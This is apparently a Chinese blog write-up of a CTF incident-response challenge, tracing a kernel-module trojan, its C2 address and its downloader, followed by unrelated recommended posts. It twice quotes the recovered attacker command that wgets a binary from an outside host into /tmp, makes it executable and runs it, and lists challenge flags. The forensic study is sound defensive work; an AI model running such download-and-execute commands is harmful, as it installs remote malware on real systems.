ciscn暨长城杯 天津赛区 ISW阶段应急响应复现

最新推荐文章于 2025-05-28 19:12:04 发布
最新推荐文章于 2025-05-28 19:12:04 发布
阅读量721 收藏 4
点赞数 7
文章标签: CTF Misc 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79355407/article/details/146363958
版权

题目介绍

小路是一名网络安全网管,据反映发现公司主机上有异常外联信息,据回忆前段时间执行过某些更新脚本(已删除),现在需要协助小路同学进行网络安全应急响应分析,查找木马,进一步分析,寻找攻击源头,获取攻击者主机权限获取 flag 文件。

1

找出主机上木马回连的主控端服务器 IP 地址(不定时 (3~5 分钟) 周期性),并以 flag{MD5} 形式提交,其中 MD5 加密目标的原始字符串格式 IP:port

这里一直分析netstat浪费了很多时间

复现时了解到:
这里是 `.ko` 内核相关文件,可能会遇到 `netstat` 检测不到网络连接情况的问题,优先使用 `tcpdump` 直接抓取网卡流量

使用r-studio进行磁盘恢复【AXIOM分析后并没有发现东西(可能是不太会用吧)】

发现被删除的1.txt,和.viminfo
image.png

1.txt

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

定位到system
image.png
查看启动服务,发现可疑内核
image.png

定位到内核文件
image.png
恢复文件,IDA分析
定位到ULRYvXzICzy880dO函数,发现木马回连的主控端服务器 IP 地址

192.168.57.203:4948

image.png

flag{59110f555b5e5cd0a8713a447b082d63}

2

找出主机上驻留的远控木马文件本体,计算该文件的 MD5, 结果提交形式
这里注意到systemd-agentd
image.png
image.png

flag{bccad26b665ca175cd02aca2903d8b1e}

3

找出主机上加载远控木马的持久化程序(下载者),其功能为下载并执行远控木马,计算该文件的 MD5, 结果提交形式:flag{MD5}

木马就是system-upgrade.ko

计算文件md5:md5sum

image.png

flag{78edba7cbd107eb6e3d2f90f5eca734e }

4

查找题目 3 中持久化程序(下载者)的植入痕迹,计算持久化程序植入时的原始名称 MD5(仅计算文件名称字符串 MD5),并提交对应 flag{MD5}

1.txt

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

这里下载文件并给予权限,

image.png

flag{9729aaace6c83b11b17b6bc3b340d00b}

参考文章:
https://tryhackmyoffsecbox.github.io/Target-Machines-WriteUp/blog/2025CCB&CISCN-Semis-ISW/

GzyNuli
关注
第一届长城杯信息安全铁人三项赛决赛 取证溯源 (复现)
m0_63138919的博客
09-14 1503
学习
【PWN · stack | vm逆向】[ 2024 · CISCN 长城杯 ] avm
Mr_Fmnwon的博客
12-16 1253
一个类似于操作系统的虚拟机,但是没有判断写长度,会越界,类似格式化字符串“读”写栈上的数据。所以我就想改ret到ROPchain,但是最后system("/bin/sh\x00")失败了,什么原因捏?
2024ciscn&长城杯
2301_80976243的博客
12-17 279
追踪 http 流量,发现 referer 头部的一串 base64 编码,解码得到flag。百度找到 ZoreShell 防火墙漏洞 CVE-2019-12725。查看 Database 下有个隐藏 nginx 猜测是木马文件。下载 nginx 文件txt打开。
第二届长城杯&CISCN半决赛-应急响应
2301_77585008的博客
05-28 889
通过R-Studio工具分析了Linux系统中的疑似木马感染事件。分析发现:1)发现system-upgrade.ko木马文件,其TCP连接4948端口的主控端服务器;2)找到驻留木马本体systemd-agentd);3)识别下载者程序;4)逆向分析获取木马通信密钥
2023年中职“网络安全“—Web 渗透测试②
weixin_57060854的博客
11-19 1986
在uploads/的后面输入%00,然后进行url进行解码,解码成一个不可见的字符。添加X-Forwarded-For后提示需要管理员才能登录,我们尝试把cookie的值改为1试试。php://filter 读取当前⻚⾯,在当前⻚⾯内容发现flag值。提示输入数字查询,猜测考的应该是sql注入,我们用sqlmap跑一下。提示我们只能本地访问,那我们就利用burp,添加一个本地访问的包。发现一个index.php.bak,访问之后获得flag。访问页面,发现一张图片,没有其他有用的信息。
2025CISCN半决赛 ISW阶段应急响应
FakoZz的博客
03-20 787
再进去看可以看到指向了/lib/modules/5.4.0-84-generic/kernel/drivers/system/system-upgrade.ko。、查找题目3中持久化程序(下载者)的植入痕迹,计算持久化程序植入时的原始名称md5(仅计算文件名称字符串md5),并提交对应flag{md5}、找出主机上加载远控木马的持久化程序(下载者),其功能为下载并执行远控木马,计算该文件的md5,结果提交形式:flag{md5}分析/lib/system/systemd-agentd。
第一届长城杯半决赛wp和AWD笔记
qq_74806534的博客
04-25 3555
网站备份文件泄露可能造成的危害:1. 网站存在备份文件:网站存在备份文件,例如数据库备份文件、网站源码备份文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。2. 敏感文件泄露是高危漏洞之一,敏感文件包括数据库配置信息,网站后台路径,物理路径泄露等,此漏洞可以帮助攻击者进一步攻击,敞开系统的大门。3. 由于目标备份文件较大(xxx.G),可能存在更多敏感数据泄露4. 该备份文件被下载后,可以被用来做代码审计,进而造成更大的危害。
长城杯线下赛赛后复现
fmyyy1的博客
10-14 1635
长城杯线下赛赛后复现 前言 去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。 fancyapi 目录结构 逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。 看看backend.go func Flag(w http.ResponseWriter, r *http.Request ) { action:= r.URL.Query().Get("action") if action == "" { fail(w,
第一届长城杯 第三赛区 半决赛 AWD 源码
04-23
【标题】"第一届长城杯 第三赛区 半决赛 AWD 源码"指的是一个编程竞赛的源代码,很可能是参赛队伍在半决赛阶段使用的自动武器动态(AWD)系统的代码。这个标题揭示了这是一个与软件开发竞赛相关的内容,特别关注的是...
2025 长城杯 决赛 逆向 第二届 长城杯 国赛 逆向
05-03
2025 长城杯 决赛 逆向 第二届 长城杯 国赛 逆向
2025 长城杯 决赛 二进制 附件 第二届 长城杯 国赛 二进制 附件
05-03
从文件的标题和描述中我们了解到,存在一个名为“2025长城杯决赛”的活动,这显然是指在2025年举行的该国赛决赛阶段。由于标题中包含了“附件”二字,我们可以推断文件可能包含的是与该比赛相关的材料,比如规则说明...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8720
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
学生证书_2025-06-10.zip
06-10
学生证书_2025-06-10.zip
深度学习Transformer架构详解:Encoder-Decoder模块功能及LoRA微调技术在机器翻译中的应用
06-10
内容概要:文档详细介绍了Transform架构中Encoder和Decoder模块的工作机制。Encoder模块将输入信息编码成特征向量序列,每个向量融合了输入序列不同位置的信息,维度与输入嵌入相同。Decoder模块接收Encoder的输出,通过一系列操作生成最终的输出,包括使用Masked Multi-Head Attention模块防止模型提前获取未来信息。两者结构相似但Decoder额外包含一层encoder-decoder attention layer。文档还阐述了从输入“我爱中国”到输出“I Love China”的具体解码过程,以及lora微调方法,即通过调整注意力层或前馈层的W矩阵来优化模型性能,减少参数更新数量。 适合人群:对深度学习和自然语言处理有一定了解的研究人员和工程师。 使用场景及目标:①理解Transform架构中Encoder和Decoder的具体工作流程;②掌握lora微调方法及其应用场景;③提高对Transformer模型内部机制的理解,以便更好地进行模型优化和应用开发。 阅读建议:由于文档涉及较多技术和数学概念,建议读者在阅读过程中结合相关理论知识进行理解,并尝试动手实践,加深对模型内部运作机制的认识。
2007-2009年黄海海底环境参数数据集.rar
06-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
158-基于springboot+vue的员工考勤管理系统视频.zip
06-10
java+vue+springboot 源代码+配套文档+教程
【图像去噪】基于matlab ADMM遥感图像去条纹噪声(含SSIM PSNR)【含Matlab源码 13499期】.zip
最新发布
06-10
Matlab领域上传的视频是由对应的完整代码运行得来的,完整代码皆可运行,亲测可用,适合小白; 1、从视频里可见完整代码的内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
LATEX中的数学符号表示
06-10
LATEX中的数学符号表示
2024长城杯密码学
03-18
- **CTF比赛平台**:CTFtime(汇总全球赛事)、攻防世界(含长城杯题型复现)。 - **工具库**:Python的`pycryptodome`库、RSA分解工具`yafu`。 3. **往届资源与题解** - 2024长城杯初赛密码学题解(参考示例中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值